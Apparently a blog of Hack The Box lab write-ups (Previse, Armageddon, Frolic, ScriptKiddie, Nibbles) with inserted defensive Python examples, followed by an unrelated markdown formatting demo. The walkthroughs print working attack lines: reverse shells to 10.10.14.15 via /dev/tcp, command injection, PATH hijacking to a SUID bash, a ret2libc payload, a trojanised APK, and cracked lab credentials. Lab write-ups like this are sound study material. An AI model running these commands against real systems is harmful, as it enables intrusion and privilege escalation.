Previse

1.nmap scan

2.website

It just has a login page.
Let's use dirsearch to find some directories.
We can see that some pages redirect to login.php.

Using Burp Suite to catch the response, we can see there is a register page, but only admin can use it.

We can use Burp Suite to manually change the response status code to 200 OK and visit accounts.php,

and thus we get access to accounts.php.

Now we can add a user to test it.
If we don't want to do this for each page action, we can have Burp do it for us while we browse the site. Go to Proxy > Options > Match and Replace > Add and set the following options:

Type: Response header
Match: 302 Found
Replace: 200 OK
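The defender's view of why that 302 to 200 rewrite works, as an added Python example (not code from the write-up or from Previse): the page sets a redirect header but never stops rendering, so the protected content travels in the body anyway. The handler names, session shape and page body are constructed.

```python
"""Why rewriting the 302 to 200 in Burp exposed accounts.php.

Constructed model of the PHP anti-pattern header("Location: login.php")
without exit(): the redirect status is set, but the script keeps running and
the protected page still ends up in the response body.
"""

PROTECTED_PAGE = "<h1>Accounts</h1><form>add user ...</form>"  # constructed body


def accounts_vulnerable(session: dict) -> tuple:
    """Redirect is issued, but rendering continues, so the body still leaks."""
    status, headers = 200, {}
    if not session.get("user"):
        status, headers = 302, {"Location": "login.php"}
        # no early return here, exactly like a PHP header() call without exit()
    body = PROTECTED_PAGE
    return status, headers, body


def accounts_fixed(session: dict) -> tuple:
    """The authorization check returns immediately; nothing is rendered."""
    if not session.get("user"):
        return 302, {"Location": "login.php"}, ""
    return 200, {}, PROTECTED_PAGE


def redirect_leaks_content(response: tuple) -> bool:
    """Proxy-log heuristic: a 3xx carrying a non-empty body means the handler
    kept executing after it decided to redirect."""
    status, _headers, body = response
    return 300 <= status < 400 and bool(body.strip())


if __name__ == "__main__":
    for name, handler in (("vulnerable", accounts_vulnerable),
                          ("fixed", accounts_fixed)):
        resp = handler({})  # anonymous session
        print(f"{name}: {resp[0]} body={len(resp[2])} bytes",
              "LEAKS" if redirect_leaks_content(resp) else "clean")
```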

Now we can download sitebackup.zip and unzip it.
In logs.php we can see a function that uses exec, and we just need to POST a $delim parameter.

We can change the request method and add a delim parameter to get a response.

We can test for command injection by adding ;curl+http://10.10.14.15/ after the POST request:

So we can try to get a reverse shell back to our machine:

;bash -c 'bash -i >& /dev/tcp/10.10.14.15/8888 0>&1' <- this needs to be URL-encoded
nc -lvnp 8888

We still can't get the user flag yet.
Next we can upgrade our shell to a more interactive one:

python3 -c 'import pty;pty.spawn("/bin/bash")' then press Ctrl+Z
stty raw -echo;fg then press ENTER twice
export TERM=xterm

We can get the MySQL username and password from config.php:

username:root
password:mySQL_p@ssw0rd!:)
db:previse
And now we can get into the database.

In the previse database we find two tables.

We can use m4lwhere to SSH in, but first we need to crack its password.
Copy the hash and crack it with hashcat:
hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt

username:m4lwhere
password:ilovecody112235!
And now we can try to SSH in:

ssh m4lwhere@10.10.11.104

And we're in.

Finally, we get the user flag.

3. getting access to root

First we use sudo -l to find commands that don't need the root password.

Reading over the script, we see that both the gzip and the date commands are called without a full path:

The PATH in Linux is how the system looks up the binary that we are trying to execute:

In this case it is going to look in /usr/local/sbin, then, if it is not there, /usr/local/bin, and so on until it is found.
We can manipulate this by changing the PATH: we can make the first entry in the PATH our current directory with the command export PATH=.:$PATH

And you can see that when I look up the cat command from the directory holding our custom one, it resolves to the current directory.
So we can do the same thing with gzip or date back on the victim's machine. First let's create our own malicious gzip command containing:

cp /bin/bash /tmp/bash && chmod u+s /tmp/bash

This creates a SUID bash that we can use for easy root access. Next we change the PATH so that it points to our current directory:

And now execute backup.sh.

And finally we execute /tmp/bash -p and get root.
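An added check (not from the write-up) for the pattern just abused: a Python audit of a sudo-runnable script for commands that will be resolved via PATH. The backup.sh content below is a constructed stand-in built from the description above, not Previse's real script.

```python
"""Audit a sudo-runnable script for commands resolved through PATH.

BACKUP_SH is a constructed stand-in for Previse's backup.sh, built from the
write-up's description (gzip and date called by bare name); it is not the
real script.
"""
import re
import shlex

BACKUP_SH = """#!/bin/bash
# constructed sample, not the box's real backup.sh
NOW=$(date +%F)
cd /var/www/file_access/files
/usr/bin/tar -cf /var/backups/backup-$NOW.tar .
gzip /var/backups/backup-$NOW.tar
"""

SHELL_BUILTINS = {"cd", "echo", "export", "exit", "set", "if", "then",
                  "fi", "for", "do", "done", "while", "read", "test"}
# points where a new simple command starts: $( ` || && | ;
NEW_COMMAND = re.compile(r"\$\(|`|\|\||&&|\||;")


def bare_commands(script: str) -> list:
    """Command names that will be searched for along PATH (no slash)."""
    found = []
    for line in script.splitlines():
        code = "" if line.startswith("#!") else line.split("#", 1)[0]
        for segment in NEW_COMMAND.split(code):
            try:
                words = shlex.split(segment)
            except ValueError:  # fragment with an unbalanced quote; skip it
                continue
            while words and re.match(r"^\w+=", words[0]):  # VAR=value prefix
                words.pop(0)
            if not words:
                continue
            cmd = words[0]
            if "/" not in cmd and cmd not in SHELL_BUILTINS:
                found.append(cmd)
    return found


def pins_path(script: str) -> bool:
    """True if the script sets its own PATH, the usual fix besides absolute paths."""
    return re.search(r"^\s*(export\s+)?PATH=", script, re.M) is not None


if __name__ == "__main__":
    print("bare commands:", bare_commands(BACKUP_SH))  # ['date', 'gzip']
    print("pins PATH:", pins_path(BACKUP_SH))          # False
```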

Armageddon

1.nmap scan

2.web

From the Burp Suite response we can tell it's built with Drupal 7.

When we use searchsploit, we can see some exploits.

We can use msfconsole to exploit it:

search drupal 7
use 1
set rhosts 10.10.10.233
set lhost 10.10.14.15

And we get a shell.

It denies us cd /home,
so we cd to sites/default, and in settings.php we can get the database's username and password:

username:drupaluser
password:CQHEy@9M*m23gBVj

We can try these to log in to MySQL,
but in /etc/passwd we don't see drupaluser, so we probably need to get password hashes from the database itself:

Using the credentials drupaluser:CQHEy@9M*m23gBVj, we can get the databases users and hashes.

mysql -u drupaluser -p"CQHEy@9M*m23gBVj" -e "use drupal; select name,pass from users;"
Using the RockYou wordlist we can crack the password hash for the brucetherealadmin user.
john -w=/usr/share/wordlists/rockyou.txt hash.txt

username:brucetherealadmin
password:booboo
And we have brucetherealadmin's password! Now let's try to log in via SSH:

3.getting root access

When we run sudo -l, it looks like we are able to run snap as the root user without any password, so let's use the GTFOBins entry for snap:

First we get fpm:

gem install fpm
Now we upload the malicious privesc snap file to the machine, and run snap as the root user to make use of the snap package we created.

Frolic

1.nmap scan

port exploration

9999: at 10.10.10.111:9999 there's a simple nginx welcome page
445: SMB is running on 445; we can use the common checks to see whether there's anything usable

smbmap -H 10.10.10.111

smbmap shows nothing we can use

smbclient -N -L //10.10.10.111

And smbclient also shows nothing interesting.

1880: the site on port 9999 gives us a URL, http://forlic.htb:1880
It's an admin web interface.

dirsearch

We try dirsearch against all the ports we found; on 9999 there are some pages:

10.10.10.111:9999/test has a phpinfo page
10.10.10.111:9999/backup has something useful
10.10.10.111:9999/dev is forbidden
10.10.10.111:9999/admin is an admin page

We can use curl 10.10.10.111:9999/backup/user.txt and curl 10.10.10.111:9999/backup/password.txt to get admin and imnothuman.

dirsearch deeper

Though /dev is forbidden, we run dirsearch against http://10.10.10.111:9999/dev to explore deeper.
It has backup and test.

In /backup it shows /playsms.
In /test it provides a file named test.
10.10.10.111:9999/playsms is another login page.

/admin

/admin loads a JS file that hides the login information.

The username is admin and the password is superduperlooperpassword_lol.
After entering it we can see some brainfuck code; decode it at:

https://www.dcode.fr/ook-language

It shows: Nothing here check /asdiSIAJJ0QWE9JAS
After visiting it, it displays a new page of encoded data; after decoding we get some message.

Decoding it, it looks like a zip:
curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d | xxd

curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d > index.php.zip
Unzipping it asks for a password.
Use fcrackzip to crack it:
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt out.zip
The options are -u to force an actual unzip, which weeds out tons of false positives, -D for dictionary mode, and -p rockyou.txt to pass the wordlist. The password is password.

Use xxd to read that back to bytes, which happen to be not only ASCII but base64 characters:
cat index.php | xxd -r -p

Decode it to get the text:
cat index.php | xxd -r -p | tr -d '\r\n' | base64 -d

It's brainfuck; decode it at https://copy.sh/brainfuck/ to get the phrase idkwhatispass.
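The whole decoding chain as one added Python example (not from the write-up), with a small brainfuck interpreter standing in for the copy.sh page; the encoded sample is constructed to print "hi", since the box's real blob is not reproduced here.

```python
"""Reverse Frolic's decoding chain in one function: hex text -> bytes
(xxd -r -p) -> strip CR/LF (tr -d '\\r\\n') -> base64 -d -> run the
brainfuck program. The sample below is constructed (a tiny program that
prints "hi"), not the box's real blob.
"""
import base64
import binascii

BF_SAMPLE = "++++++++++[>++++++++++<-]>++++.+."  # constructed: prints "hi"
# Layering as on the box: base64 text with a CRLF inside, then hex-encoded.
_b64 = base64.b64encode(BF_SAMPLE.encode()).decode()
HEX_TEXT = binascii.hexlify((_b64[:12] + "\r\n" + _b64[12:]).encode()).decode()


def run_brainfuck(code: str, max_steps: int = 1_000_000) -> str:
    """Minimal interpreter: precomputed bracket jumps plus a step limit, so a
    malformed or hostile program cannot hang the analyst. ',' is ignored."""
    jumps, stack = {}, []
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError("unbalanced ']'")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError("unbalanced '['")
    tape, ptr, pc, out = [0] * 30000, 0, 0, []
    for _ in range(max_steps):
        if pc >= len(code):
            return "".join(out)
        c = code[pc]
        if c == ">": ptr += 1
        elif c == "<": ptr -= 1
        elif c == "+": tape[ptr] = (tape[ptr] + 1) % 256
        elif c == "-": tape[ptr] = (tape[ptr] - 1) % 256
        elif c == ".": out.append(chr(tape[ptr]))
        elif c == "[" and tape[ptr] == 0: pc = jumps[pc]
        elif c == "]" and tape[ptr] != 0: pc = jumps[pc]
        pc += 1
    raise RuntimeError("step limit reached")


def decode_layers(hex_text: str) -> str:
    raw = binascii.unhexlify("".join(hex_text.split()))       # xxd -r -p
    b64 = raw.replace(b"\r", b"").replace(b"\n", b"")        # tr -d '\r\n'
    program = base64.b64decode(b64, validate=True).decode()  # base64 -d
    return run_brainfuck(program)
```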

2.shell as web

Now we have two passwords:

1. admin/superduperlooperpassword_lol
2. admin/idkwhatispass
Try them at /admin and /playsms; in the end password 2 worked on /playsms.

Use msfconsole:

msfconsole
search playsms
use 1
set rhost 10.10.10.111
set rport 9999
set targeturi /playsms/index.php
set lhost 10.10.14.15

Then we get a webshell.

3.shell as root

First improve the shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'
We can see some hidden directories in ayush's home. The .binary directory holds rop, which has the SUID bit set and is owned by root. rop's function is to take our input and print it back. First let's see what's configured:
cat /proc/sys/kernel/randomize_va_space

It shows ASLR is disabled.
Because we can't read the binary directly over this shell, we base64-encode it,
copy the output to our local machine and restore it with base64 -d rop_b64 > rop.

Open it in gdb with PEDA and run checksec.

We can force the program to crash.

background

I can cause the program to crash by sending too much input, which likely means I can overwrite the return address somewhere. Given that ASLR is disabled but DEP (NX) is enabled, the easiest attack path is return to libc.
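Reading those protections straight from the ELF program headers, as an added Python example (not the write-up's tooling): it reports NX, PIE and a canary heuristic the way checksec does. The sample ELF is constructed inline; point checksec() at a real file's bytes to use it.

```python
"""A minimal checksec for the properties the write-up leans on: NX from the
PT_GNU_STACK program header, PIE from e_type, and a stack-canary heuristic
(presence of the __stack_chk_fail symbol name). The sample is a constructed
32-bit ELF header, not Frolic's rop.
"""
import struct

PT_GNU_STACK = 0x6474E551
PF_X = 0x1
ET_DYN = 3  # shared object / PIE executable


def checksec(data: bytes) -> dict:
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = data[4] == 2
    end = "<" if data[5] == 1 else ">"
    e_type = struct.unpack_from(end + "H", data, 16)[0]
    if is64:
        phoff = struct.unpack_from(end + "Q", data, 32)[0]
        phentsize, phnum = struct.unpack_from(end + "HH", data, 54)
    else:
        phoff = struct.unpack_from(end + "I", data, 28)[0]
        phentsize, phnum = struct.unpack_from(end + "HH", data, 42)
    # No PT_GNU_STACK at all means the x86 loader falls back to an
    # executable stack, so start from the pessimistic answer.
    nx = False
    for i in range(phnum):
        off = phoff + i * phentsize
        p_type = struct.unpack_from(end + "I", data, off)[0]
        flags_off = off + 4 if is64 else off + 24  # p_flags position differs
        p_flags = struct.unpack_from(end + "I", data, flags_off)[0]
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    return {"bits": 64 if is64 else 32, "nx": nx,
            "pie": e_type == ET_DYN, "canary": b"__stack_chk_fail" in data}


def build_sample_elf32(stack_exec: bool, pie: bool) -> bytes:
    """Constructed: ELF32 header plus a single PT_GNU_STACK program header."""
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8  # 32-bit, LE, v1
    hdr = ident + struct.pack("<HHIIIIIHHHHHH", ET_DYN if pie else 2, 3, 1,
                              0x8048000, 52, 0, 0, 52, 32, 1, 40, 0, 0)
    flags = 0x6 | (PF_X if stack_exec else 0)  # RW, optionally +X
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, flags, 16)
    return hdr + phdr


if __name__ == "__main__":
    print(checksec(build_sample_elf32(stack_exec=False, pie=False)))
```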

understand return to libc
1.stack

The stack starts at high memory addresses, and builds up to lower memory addresses. Inside any given function, there’s a stack frame. The bottom of the stack frame is stored in the RBP (or EBP on x86) register. The top is stored in RSP (or ESP). For example (and I’ll use 32-bit registers in this example since Frolic is 32-bit):

2.function call

When a function is called, the arguments are put onto the stack (either by adding space to the top or using the space already there). So, for example, the program comes to:

Just before the call, two addresses are stored in ESP and ESP+4. These are the addresses of the string to copy and the buffer to copy it to:

Now the call instruction is reached. It is going to push the next instruction to the top of the stack (as the return address), and then jump execution to the new function. The next function is going to start with some common stuff, known as the prologue:

So take that step by step. call pushes return address:

Now push ebp:

mov ebp, esp:

Finally sub esp, 0x100:

3. stack return

When a function is done, it will typically end with:

leave
ret

leave is equivalent to mov esp, ebp followed by pop ebp,
so the stack from before becomes:

Then when the return happens, the instruction pointer is popped, bringing that stack back to where it started:

4.What Is Return to libc

A return to libc attack involves overwriting the return address in such a way that the computer jumps to the function I want. The standard case is the system function, with the argument /bin/sh, giving me a shell.

If I were to call system("/bin/sh") normally, I would enter the function after the call but before the prologue with a stack like this:

The return address would be pushed onto the stack by the call instruction. But I’m not going to be going to system via a call, but rather a ret. So, I want the stack to look like this when I reach the return:

That way, ret will pop the system address into the instruction pointer, and the stack will look right. Since I don’t know the right return address, I’ll just use the function exit, so it cleanly exits when I’m done.

Find the Offset to EIP

Open the file with gdb-peda and send in a pattern. When the program crashes, I can take EIP and find out where that was in the pattern using pattern offset. I can use the ASCII or hex value:

To double check that, I’ll send in a buffer of 52 As and then 4 Bs:

Crash, with EIP as BBBB.

Addresses

Now I just need the addresses of system, exit, and /bin/sh in libc. These will vary between hosts, so I'll get the info with my shell on Frolic. First, I'll get the libc base address with ldd.
Next, I'll use readelf -s to get the offsets of various functions, and grep out system and exit.
Now I'll use strings -a -t x to list the strings in libc with hex offsets, and grep for "/bin/sh":

Now I can calculate the address for each of the three using any calculator (gdb here):

exploit

I can put that all together into this template: "A" * 52 + SYSTEM + EXIT + /bin/sh. I could write a python script to do this, but this case is simple enough that I can just do it as a one-liner. When I run that on Frolic, I’m root:
./rop $(python -c 'print("a"*52 + "\xa0\x3d\xe5\xb7" + "\xd0\x79\xe4\xb7" + "\x0b\x4a\xf7\xb7")')
Now we finally get the flag.

ScriptKiddie

1.nmap scan

nmap -sCV --min-rate=10000 -p- 10.10.10.226

2.site

The website has three parts.
The first is an nmap module: when we type in an IP, it sends back the nmap result.
The payload section lets us generate a payload after choosing an IP, OS and template file.
The third part looks like a searchsploit module.

foothold

When we search for msfvenom, we can see there is an exploit for versions before 6.0.11.

We can give it a try.
msfvenom handles an APK template file. The idea of the template file is that you can pass msfvenom a legitimate .exe or .apk, and it will try to build a malicious file into that file while preserving the intended functionality. This allows attackers to hide behind the legitimate functionality.

build payload

We can use searchsploit -m 49491.py to grab the exploit.
Change the payload to bash -c 'bash -i >&/dev/tcp/10.10.14.15/8888 0>&1' to get a reverse shell.
If execution fails, first run apt-get install openjdk-11-jdk-headless to make jarsigner available.
Alternatively we can use msfconsole to generate the APK; we should change the payload to cmd/unix/reverse_netcat:

msfconsole
search msfvenom
use 0
set payload cmd/unix/reverse
set lhost xxxx
run

get webshell

And we can upload the APK to the website:
in the website's "payloads" section, select Android for OS and upload the APK file generated by Metasploit.

In /home we find two users, kid and pwn.

In pwn's folder we find a script called scanlosers.sh.

The script's function is to scan the IPs written to /home/kid/logs/hackers,
but it doesn't sanitise the input that the hackers file provides,
so we can append a reverse shell command to the file:
echo "test ;/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.15/8888 0>&1' #" >> /home/kid/logs/hackers
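How scanlosers.sh should have treated that file, as an added Python example (not the box's script): each field is accepted only if it parses as an IP address, and the scan is built as an argv list rather than a shell string. The log line format and the nmap invocation are assumptions.

```python
"""Hardened handling of the hackers log that scanlosers.sh consumes on
ScriptKiddie. Assumes the log lines look like "[timestamp] <ip>" and that
the scan is nmap; both are assumptions, not taken from the box.
"""
import ipaddress
import subprocess

# Constructed log: two honest entries and one with the injection shape from
# the write-up (a ';' introducing a command, a trailing '#').
HACKERS_LOG = """\
[2021-02-03 12:00:01] 10.10.14.15
[2021-02-03 12:00:09] 10.10.14.22
[2021-02-03 12:00:15] test ;/bin/bash -c 'id' #
"""


def extract_targets(log: str) -> tuple:
    """Keep only fields that parse as an IP address; report the rest.
    Anything rejected never reaches a command line."""
    good, rejected = [], []
    for raw in log.splitlines():
        field = raw.split("] ", 1)[-1].strip()
        try:
            good.append(str(ipaddress.ip_address(field)))
        except ValueError:
            rejected.append(raw)
    return good, rejected


def scan_argv(target: str) -> list:
    """argv form, never a shell string: a hostile value would be one literal
    argument, and extract_targets() has already refused it anyway."""
    return ["nmap", "--top-ports", "10", "-oN", f"recon/{target}.nmap", target]


def run_scans(log: str, dry_run: bool = True) -> list:
    """Build (and optionally run) one scan per validated target."""
    cmds = [scan_argv(t) for t in extract_targets(log)[0]]
    if not dry_run:
        for argv in cmds:
            subprocess.run(argv, check=False)  # list form => shell=False
    return cmds


if __name__ == "__main__":
    targets, bad = extract_targets(HACKERS_LOG)
    print("scanning:", targets)
    print("rejected:", bad)
```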

3.shell as root

As pwn, we can run sudo msfconsole without a password.

And we get root.

We can exec commands inside msf or use /bin/bash -i to drop to a root shell.

Nibbles

1.nmap scan

nmap -sCV --min-rate=10000 -p- 10.10.10.75

2.site

web

The website just says hello world, but the source code hides a hint:
<!-- /nibbleblog/ directory. Nothing interesting here! -->
Visit it.

dirsearch

We use dirsearch to enumerate its directories and find some pages we can visit.

When we visit some of them we get a directory listing. Exploring the resulting paths, /nibbleblog/content is interesting, and has directory listing enabled. Digging deeper, there's a page at /nibbleblog/content/private/user.xml which reveals a user, admin, as well as the IPs that have tried to log in as it.

logging into admin

Visit http://10.10.10.75/nibbleblog/admin.php.
We don't have the creds. Most writeups say they guessed the password or took it from the information in http://10.10.10.75/nibbleblog/content/private/config.xml (admin / nibbles).

Exploitation

On the settings page we learn that the site is Nibbleblog 4.0.3.
We can use searchsploit to find a PoC;
it has a file upload exploit.
We use msf to get a webshell.

after this,we can get user.txt

3.getting root

First get a fully interactive shell using the python pty.spawn one-liner:
python3 -c 'import pty;pty.spawn("/bin/bash")'
We can try running monitor.sh: the colour of the text changes.

sudo trick
From this article we can learn how to use sudo-enabled files to open system-level tools like /bin/bash.
If you have write and execute permissions on a file that runs with elevated privileges, you can add commands, such as system calls, to get what you want.
We can use the following commands to get root:

echo "#! /bin/bash" > monitor.sh
echo "/bin/bash -i" >> monitor.sh
sudo ./monitor.sh

first_blog

h1 heading

h2 heading

h3 heading

h4 heading

h5 heading
h6 heading

Horizontal rule




Text styles

This is bold text

This is bold text

This is italic text

This is italic text

Strikethrough

Lists

Unordered

  • Create a list by starting a line with +, -, or *
  • Sub-lists are made by indenting 2 spaces:
    • Marker character change forces new list start:
      • Ac tristique libero volutpat at
      • Facilisis in pretium nisl aliquet
      • Nulla volutpat aliquam velit
  • Very easy!

Ordered

  1. Lorem ipsum dolor sit amet

  2. Consectetur adipiscing elit

  3. Integer molestie lorem at massa

  4. You can use sequential numbers…

  5. …or keep all the numbers as 1.

Start numbering with offset:

  1. foo
  2. bar

Code

Inline code

Indented code

// Some comments
line 1 of code
line 2 of code
line 3 of code

Block code “fences”

Sample text here...

Syntax highlighting

var foo = function (bar) {
return bar++;
};

console.log(foo(5));

creds